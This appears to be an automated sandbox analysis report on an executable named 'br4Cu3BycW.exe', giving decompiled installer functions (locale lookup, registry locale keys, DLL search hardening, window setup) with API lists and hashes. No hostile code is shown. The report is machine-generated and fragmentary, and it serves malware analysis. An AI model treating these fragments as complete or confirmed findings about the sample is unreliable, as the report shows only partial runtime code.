                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: DisableProcessWindowsGhosting$user32.dll
                                                            • API String ID: 1646373207-834958232
                                                            • Opcode ID: 93f995bdab4b473a61fd02318e1a2b49a3f24fe148fe8aefdfb1ddf0f8e4a138
                                                            • Instruction ID: a737f6cb342469133653c2ad22e7ce718afd724c013acdac2058dbbd1ad6bbf7
                                                            • Opcode Fuzzy Hash: 93f995bdab4b473a61fd02318e1a2b49a3f24fe148fe8aefdfb1ddf0f8e4a138
                                                            • Instruction Fuzzy Hash: 99B092F0240331101C1072B33C02ACA080A08CBB497024C2A3720A108ADD4880C01239
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Analysis Process: br4Cu3BycW.exe PID: 5092 Parent PID: 5816 br4Cu3BycW.exeCOMMON

                                                            Executed Functions

                                                            Function 0040B044, Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 73%
                                                            			E0040B044(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
				char _v8;
				short _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _t29;
				void* _t40;
				intOrPtr* _t44;
				intOrPtr _t55;
				void* _t61;

				_push(__ebx);
				_v24 = 0;
				_v20 = 0;
				_t44 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t61);
				_push(0x40b104);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffec;
				_t21 =  &_v16;
				L00403730();
				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
				E0040858C( &_v20, 4,  &_v16);
				E0040873C(_t44, _v20, _v8);
				_t29 = E0040AEF4( *_t44, _t44); // executed
				if(_t29 == 0) {
					_v12 = 0;
					E0040858C( &_v24, 4,  &_v16);
					E0040873C(_t44, _v24, _v8);
					_t40 = E0040AEF4( *_t44, _t44); // executed
					if(_t40 == 0) {
						E00407A20(_t44);
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E0040B10B);
				E00407A80( &_v24, 2);
				return E00407A20( &_v8);
			}













                                                            0x0040b04a
                                                            0x0040b04d
                                                            0x0040b050
                                                            0x0040b053
                                                            0x0040b055
                                                            0x0040b05b
                                                            0x0040b062
                                                            0x0040b063
                                                            0x0040b068
                                                            0x0040b06b
                                                            0x0040b070
                                                            0x0040b076
                                                            0x0040b07f
                                                            0x0040b08f
                                                            0x0040b09c
                                                            0x0040b0a3
                                                            0x0040b0aa
                                                            0x0040b0ac
                                                            0x0040b0bd
                                                            0x0040b0ca
                                                            0x0040b0d1
                                                            0x0040b0d8
                                                            0x0040b0dc
                                                            0x0040b0dc
                                                            0x0040b0d8
                                                            0x0040b0e3
                                                            0x0040b0e6
                                                            0x0040b0e9
                                                            0x0040b0f6
                                                            0x0040b103

                                                            APIs
                                                            • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B076
                                                            • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B07F
                                                              • Part of subcall function 0040AEF4: FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                              • Part of subcall function 0040AEF4: FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                            • String ID:
                                                            • API String ID: 3216391948-0
                                                            • Opcode ID: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                            • Instruction ID: a9cfc37755e84068b6e5d0711ea0537dd567252b91127d2e7da10f621904fc04
                                                            • Opcode Fuzzy Hash: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                            • Instruction Fuzzy Hash: 35113674A041099BDB00EB95C9529AEB3B9EF44304F50447FA515B73C1DB785E058A6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040AEF4, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 46%
                                                            			E0040AEF4(char __eax, signed int __ebx) {
				char _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* _t15;
				intOrPtr _t24;
				void* _t27;

				_push(__ebx);
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t27);
				_push(0x40af52);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27 + 0xfffffdac;
				_t15 = FindFirstFileW(E004084EC(_v8),  &_v600); // executed
				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
					FindClose(_t15);
				}
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(E0040AF59);
				return E00407A20( &_v8);
			}








                                                            0x0040aefd
                                                            0x0040aefe
                                                            0x0040af04
                                                            0x0040af0b
                                                            0x0040af0c
                                                            0x0040af11
                                                            0x0040af14
                                                            0x0040af27
                                                            0x0040af34
                                                            0x0040af37
                                                            0x0040af37
                                                            0x0040af3e
                                                            0x0040af41
                                                            0x0040af44
                                                            0x0040af51

                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                            • Instruction ID: b27eefbf95a445daf5872925c41aeb1c7ded3ce7930a436f9b8cfd192dc84724
                                                            • Opcode Fuzzy Hash: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                            • Instruction Fuzzy Hash: 5FF0B471518209BFC710FB75CD4294EB7ACEB043147A005B6B504F32C1E638AF149519
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004B5114, Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 165libraryloaderCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 73%
                                                            			E004B5114(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				long _t39;
				_Unknown_base(*)()* _t42;
				_Unknown_base(*)()* _t43;
				_Unknown_base(*)()* _t46;
				signed int _t51;
				void* _t111;
				void* _t112;
				intOrPtr _t129;
				struct HINSTANCE__* _t148;
				intOrPtr* _t150;
				intOrPtr _t152;
				intOrPtr _t153;

				_t152 = _t153;
				_t112 = 7;
				do {
					_push(0);
					_push(0);
					_t112 = _t112 - 1;
				} while (_t112 != 0);
				_push(_t152);
				_push(0x4b5388);
				_push( *[fs:eax]);
				 *[fs:eax] = _t153;
				 *0x4be664 =  *0x4be664 - 1;
				if( *0x4be664 >= 0) {
					L19:
					_pop(_t129);
					 *[fs:eax] = _t129;
					_push(0x4b538f);
					return E00407A80( &_v60, 0xe);
				} else {
					_t148 = GetModuleHandleW(L"kernel32.dll");
					_t39 = GetVersion();
					_t111 = 0;
					if(_t39 != 0x600) {
						_t150 = GetProcAddress(_t148, "SetDefaultDllDirectories");
						if(_t150 != 0) {
							 *_t150(0x800);
							asm("sbb ebx, ebx");
							_t111 = 1;
						}
					}
					if(_t111 == 0) {
						_t46 = GetProcAddress(_t148, "SetDllDirectoryW");
						if(_t46 != 0) {
							 *_t46(0x4b53e4);
						}
						E0040E520( &_v8);
						E00407E00(0x4be668, _v8);
						if( *0x4be668 != 0) {
							_t51 =  *0x4be668;
							if(_t51 != 0) {
								_t51 =  *(_t51 - 4);
							}
							if( *((short*)( *0x4be668 + _t51 * 2 - 2)) != 0x5c) {
								E004086E4(0x4be668, 0x4b53f4);
							}
							E0040873C( &_v12, L"uxtheme.dll",  *0x4be668);
							E0040E54C(_v12, _t111);
							E0040873C( &_v16, L"userenv.dll",  *0x4be668);
							E0040E54C(_v16, _t111);
							E0040873C( &_v20, L"setupapi.dll",  *0x4be668);
							E0040E54C(_v20, _t111);
							E0040873C( &_v24, L"apphelp.dll",  *0x4be668);
							E0040E54C(_v24, _t111);
							E0040873C( &_v28, L"propsys.dll",  *0x4be668);
							E0040E54C(_v28, _t111);
							E0040873C( &_v32, L"dwmapi.dll",  *0x4be668);
							E0040E54C(_v32, _t111);
							E0040873C( &_v36, L"cryptbase.dll",  *0x4be668);
							E0040E54C(_v36, _t111);
							E0040873C( &_v40, L"oleacc.dll",  *0x4be668);
							E0040E54C(_v40, _t111);
							E0040873C( &_v44, L"version.dll",  *0x4be668);
							E0040E54C(_v44, _t111);
							E0040873C( &_v48, L"profapi.dll",  *0x4be668);
							E0040E54C(_v48, _t111);
							E0040873C( &_v52, L"comres.dll",  *0x4be668);
							E0040E54C(_v52, _t111);
							E0040873C( &_v56, L"clbcatq.dll",  *0x4be668);
							E0040E54C(_v56, _t111);
							E0040873C( &_v60, L"ntmarta.dll",  *0x4be668);
							E0040E54C(_v60, _t111);
						}
					}
					_t42 = GetProcAddress(_t148, "SetSearchPathMode");
					if(_t42 != 0) {
						 *_t42(0x8001);
					}
					_t43 = GetProcAddress(_t148, "SetProcessDEPPolicy");
					if(_t43 != 0) {
						 *_t43(1); // executed
					}
					goto L19;
				}
			}





























                                                            0x004b5115
                                                            0x004b5117
                                                            0x004b511c
                                                            0x004b511c
                                                            0x004b511e
                                                            0x004b5120
                                                            0x004b5120
                                                            0x004b5128
                                                            0x004b5129
                                                            0x004b512e
                                                            0x004b5131
                                                            0x004b5134
                                                            0x004b513b
                                                            0x004b536d
                                                            0x004b536f
                                                            0x004b5372
                                                            0x004b5375
                                                            0x004b5387
                                                            0x004b5141
                                                            0x004b514b
                                                            0x004b514d
                                                            0x004b5154
                                                            0x004b515a
                                                            0x004b5167
                                                            0x004b516b
                                                            0x004b5172
                                                            0x004b5177
                                                            0x004b5179
                                                            0x004b5179
                                                            0x004b516b
                                                            0x004b517c
                                                            0x004b5188
                                                            0x004b518f
                                                            0x004b5196
                                                            0x004b5196
                                                            0x004b519b
                                                            0x004b51a8
                                                            0x004b51b4
                                                            0x004b51ba
                                                            0x004b51c1
                                                            0x004b51c6
                                                            0x004b51c6
                                                            0x004b51d4
                                                            0x004b51e0
                                                            0x004b51e0
                                                            0x004b51f3
                                                            0x004b51fb
                                                            0x004b520e
                                                            0x004b5216
                                                            0x004b5229
                                                            0x004b5231
                                                            0x004b5244
                                                            0x004b524c
                                                            0x004b525f
                                                            0x004b5267
                                                            0x004b527a
                                                            0x004b5282
                                                            0x004b5295
                                                            0x004b529d
                                                            0x004b52b0
                                                            0x004b52b8
                                                            0x004b52cb
                                                            0x004b52d3
                                                            0x004b52e6
                                                            0x004b52ee
                                                            0x004b5301
                                                            0x004b5309
                                                            0x004b531c
                                                            0x004b5324
                                                            0x004b5337
                                                            0x004b533f
                                                            0x004b533f
                                                            0x004b51b4
                                                            0x004b534a
                                                            0x004b5351
                                                            0x004b5358
                                                            0x004b5358
                                                            0x004b5360
                                                            0x004b5367
                                                            0x004b536b
                                                            0x004b536b
                                                            0x00000000
                                                            0x004b5367

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B5146
                                                            • GetVersion.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B514D
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004B5162
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004B5188
                                                              • Part of subcall function 0040E54C: SetErrorMode.KERNEL32(00008000), ref: 0040E55A
                                                              • Part of subcall function 0040E54C: LoadLibraryW.KERNEL32(00000000,00000000,0040E5AE,?,00000000,0040E5CC,?,00008000), ref: 0040E58F
                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004B534A
                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004B5360
                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B536B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressProc$ErrorHandleLibraryLoadModeModulePolicyProcessVersion
                                                            • String ID: SetDefaultDllDirectories$SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$apphelp.dll$clbcatq.dll$comres.dll$cryptbase.dll$dwmapi.dll$hK$hK$kernel32.dll$ntmarta.dll$oleacc.dll$profapi.dll$propsys.dll$setupapi.dll$userenv.dll$uxtheme.dll$version.dll
                                                            • API String ID: 2248137261-3182217745
                                                            • Opcode ID: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                            • Instruction ID: 14362f36823de93a6bafc63c1bb5288ecf7b8ac372eee3bc1917329a49ba756d
                                                            • Opcode Fuzzy Hash: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                            • Instruction Fuzzy Hash: 57513C34601504ABE701EBA6DC82FDEB3A5AB94348BA4493BE40077395DF7C9D428B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040AB18, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E0040AB18(char __eax, void* __ebx, void* __ecx, void* __edx) {
				char _v8;
				char* _v12;
				void* _v16;
				int _v20;
				short _v542;
				long _t51;
				long _t85;
				long _t87;
				long _t89;
				long _t91;
				long _t93;
				void* _t97;
				intOrPtr _t106;
				intOrPtr _t108;
				void* _t112;
				void* _t113;
				intOrPtr _t114;

				_t112 = _t113;
				_t114 = _t113 + 0xfffffde4;
				_t97 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t112);
				_push(0x40ad3d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114;
				if(_v8 != 0) {
					E0040A34C( &_v542, E004084EC(_v8), 0x105);
				} else {
					GetModuleFileNameW(0,  &_v542, 0x105);
				}
				if(_v542 == 0) {
					L18:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(E0040AD44);
					return E00407A20( &_v8);
				} else {
					_v12 = 0;
					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
					if(_t51 == 0) {
						L10:
						_push(_t112);
						_push(0x40ad20);
						_push( *[fs:eax]);
						 *[fs:eax] = _t114;
						E0040A928( &_v542, 0x105);
						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
							if(RegQueryValueExW(_v16, E0040AE30, 0, 0, 0,  &_v20) == 0) {
								_v12 = E004053F0(_v20);
								RegQueryValueExW(_v16, E0040AE30, 0, 0, _v12,  &_v20);
								E00408550(_t97, _v12);
							}
						} else {
							_v12 = E004053F0(_v20);
							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
							E00408550(_t97, _v12);
						}
						_pop(_t108);
						 *[fs:eax] = _t108;
						_push(E0040AD27);
						if(_v12 != 0) {
							E0040540C(_v12);
						}
						return RegCloseKey(_v16);
					} else {
						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
						if(_t85 == 0) {
							goto L10;
						} else {
							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
							if(_t87 == 0) {
								goto L10;
							} else {
								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
								if(_t89 == 0) {
									goto L10;
								} else {
									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
									if(_t91 == 0) {
										goto L10;
									} else {
										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
										if(_t93 != 0) {
											goto L18;
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				}
			}




















                                                            0x0040ab19
                                                            0x0040ab1b
                                                            0x0040ab22
                                                            0x0040ab24
                                                            0x0040ab2a
                                                            0x0040ab31
                                                            0x0040ab32
                                                            0x0040ab37
                                                            0x0040ab3a
                                                            0x0040ab41
                                                            0x0040ab6d
                                                            0x0040ab43
                                                            0x0040ab51
                                                            0x0040ab51
                                                            0x0040ab7a
                                                            0x0040ad27
                                                            0x0040ad29
                                                            0x0040ad2c
                                                            0x0040ad2f
                                                            0x0040ad3c
                                                            0x0040ab80
                                                            0x0040ab82
                                                            0x0040ab9a
                                                            0x0040aba1
                                                            0x0040ac41
                                                            0x0040ac43
                                                            0x0040ac44
                                                            0x0040ac49
                                                            0x0040ac4c
                                                            0x0040ac5a
                                                            0x0040ac7b
                                                            0x0040acca
                                                            0x0040acd4
                                                            0x0040acec
                                                            0x0040acf6
                                                            0x0040acf6
                                                            0x0040ac7d
                                                            0x0040ac85
                                                            0x0040ac9f
                                                            0x0040aca9
                                                            0x0040aca9
                                                            0x0040acfd
                                                            0x0040ad00
                                                            0x0040ad03
                                                            0x0040ad0c
                                                            0x0040ad11
                                                            0x0040ad11
                                                            0x0040ad1f
                                                            0x0040aba7
                                                            0x0040abbc
                                                            0x0040abc3
                                                            0x00000000
                                                            0x0040abc5
                                                            0x0040abda
                                                            0x0040abe1
                                                            0x00000000
                                                            0x0040abe3
                                                            0x0040abf8
                                                            0x0040abff
                                                            0x00000000
                                                            0x0040ac01
                                                            0x0040ac16
                                                            0x0040ac1d
                                                            0x00000000
                                                            0x0040ac1f
                                                            0x0040ac34
                                                            0x0040ac3b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040ac3b
                                                            0x0040ac1d
                                                            0x0040abff
                                                            0x0040abe1
                                                            0x0040abc3
                                                            0x0040aba1

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040AD3D,?,?), ref: 0040AB51
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040AB9A
                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040ABBC
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040ABDA
                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040ABF8
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040AC16
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040AC34
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D), ref: 0040AC74
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001), ref: 0040AC9F
                                                            • RegCloseKey.ADVAPI32(?,0040AD27,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales), ref: 0040AD1A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Open$QueryValue$CloseFileModuleName
                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                            • API String ID: 2701450724-3496071916
                                                            • Opcode ID: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                            • Instruction ID: cdbeddac4db4dda9279672c2614f8dce2a18b15a4a55f9a64fe791b6da82c449
                                                            • Opcode Fuzzy Hash: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                            • Instruction Fuzzy Hash: FB514371A80308BEEB10DA95CC46FAE77BCEB08709F504477BA04F75C1D6B8AA50975E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004B63A1, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 85%
                                                            			E004B63A1(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t17;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t25;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t36;
				intOrPtr _t39;
				int _t40;
				intOrPtr _t41;
				intOrPtr _t43;
				struct HWND__* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t73;
				void* _t74;

				_t74 = __eflags;
				_t72 = __esi;
				_t71 = __edi;
				_t52 = __ebx;
				_pop(_t62);
				 *[fs:eax] = _t62;
				_t17 =  *0x4c1d88; // 0x0
				 *0x4c1d88 = 0;
				E00405CE8(_t17);
				_t21 = E0040E450(0, L"STATIC", 0,  *0x4be634, 0, 0, 0, 0, 0, 0, 0); // executed
				 *0x4ba450 = _t21;
				_t22 =  *0x4ba450; // 0x120262
				 *0x4c1d80 = SetWindowLongW(_t22, 0xfffffffc, E004AF69C);
				_t25 =  *0x4ba450; // 0x120262
				 *(_t73 - 0x58) = _t25;
				 *((char*)(_t73 - 0x54)) = 0;
				_t26 =  *0x4c1d90; // 0x4d703c
				_t4 = _t26 + 0x20; // 0x415c9b
				 *((intOrPtr*)(_t73 - 0x50)) =  *_t4;
				 *((char*)(_t73 - 0x4c)) = 0;
				_t28 =  *0x4c1d90; // 0x4d703c
				_t7 = _t28 + 0x24; // 0xcb000
				 *((intOrPtr*)(_t73 - 0x48)) =  *_t7;
				 *((char*)(_t73 - 0x44)) = 0;
				E0041A87C(L"/SL5=\"$%x,%d,%d,", 2, _t73 - 0x58, _t73 - 0x40);
				_push( *((intOrPtr*)(_t73 - 0x40)));
				_push( *0x4c1d84);
				_push(0x4b6680);
				E00422BC4(_t73 - 0x5c, __ebx, __esi, _t74);
				_push( *((intOrPtr*)(_t73 - 0x5c)));
				E004087C4(_t73 - 0x3c, __ebx, 4, __edi, __esi);
				_t36 =  *0x4c1d9c; // 0x0, executed
				E004AF728(_t36, _t52, 0x4ba44c,  *((intOrPtr*)(_t73 - 0x3c)), _t71, _t72, __fp0); // executed
				if( *0x4ba448 != 0xffffffff) {
					_t50 =  *0x4ba448; // 0x0
					E004AF60C(_t50);
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E004B6554);
				_t39 =  *0x4c1d88; // 0x0
				_t40 = E00405CE8(_t39);
				if( *0x4c1d9c != 0) {
					_t70 =  *0x4c1d9c; // 0x0
					_t40 = E004AF1B4(0, _t70, 0xfa, 0x32); // executed
				}
				if( *0x4c1d94 != 0) {
					_t47 =  *0x4c1d94; // 0x0
					_t40 = RemoveDirectoryW(E004084EC(_t47)); // executed
				}
				if( *0x4ba450 != 0) {
					_t46 =  *0x4ba450; // 0x120262
					_t40 = DestroyWindow(_t46); // executed
				}
				if( *0x4c1d78 != 0) {
					_t41 =  *0x4c1d78; // 0x0
					_t60 =  *0x4c1d7c; // 0x1
					_t69 =  *0x426bb0; // 0x426bb4
					E00408D08(_t41, _t60, _t69);
					_t43 =  *0x4c1d78; // 0x0
					E0040540C(_t43);
					 *0x4c1d78 = 0;
					return 0;
				}
				return _t40;
			}
























                                                            0x004b63a1
                                                            0x004b63a1
                                                            0x004b63a1
                                                            0x004b63a1
                                                            0x004b63a3
                                                            0x004b63a6
                                                            0x004b63d3
                                                            0x004b63da
                                                            0x004b63e0
                                                            0x004b6407
                                                            0x004b640c
                                                            0x004b6418
                                                            0x004b6423
                                                            0x004b642c
                                                            0x004b6431
                                                            0x004b6434
                                                            0x004b6438
                                                            0x004b643d
                                                            0x004b6440
                                                            0x004b6443
                                                            0x004b6447
                                                            0x004b644c
                                                            0x004b644f
                                                            0x004b6452
                                                            0x004b6463
                                                            0x004b6468
                                                            0x004b646b
                                                            0x004b6471
                                                            0x004b6479
                                                            0x004b647e
                                                            0x004b6489
                                                            0x004b6496
                                                            0x004b649b
                                                            0x004b64a7
                                                            0x004b64a9
                                                            0x004b64ae
                                                            0x004b64ae
                                                            0x004b64b5
                                                            0x004b64b8
                                                            0x004b64bb
                                                            0x004b64c0
                                                            0x004b64c5
                                                            0x004b64d1
                                                            0x004b64df
                                                            0x004b64e7
                                                            0x004b64e7
                                                            0x004b64f3
                                                            0x004b64f5
                                                            0x004b6500
                                                            0x004b6500
                                                            0x004b650c
                                                            0x004b650e
                                                            0x004b6514
                                                            0x004b6514
                                                            0x004b6520
                                                            0x004b6522
                                                            0x004b6527
                                                            0x004b652d
                                                            0x004b6533
                                                            0x004b6538
                                                            0x004b653d
                                                            0x004b6544
                                                            0x00000000
                                                            0x004b6544
                                                            0x004b6549

                                                            APIs
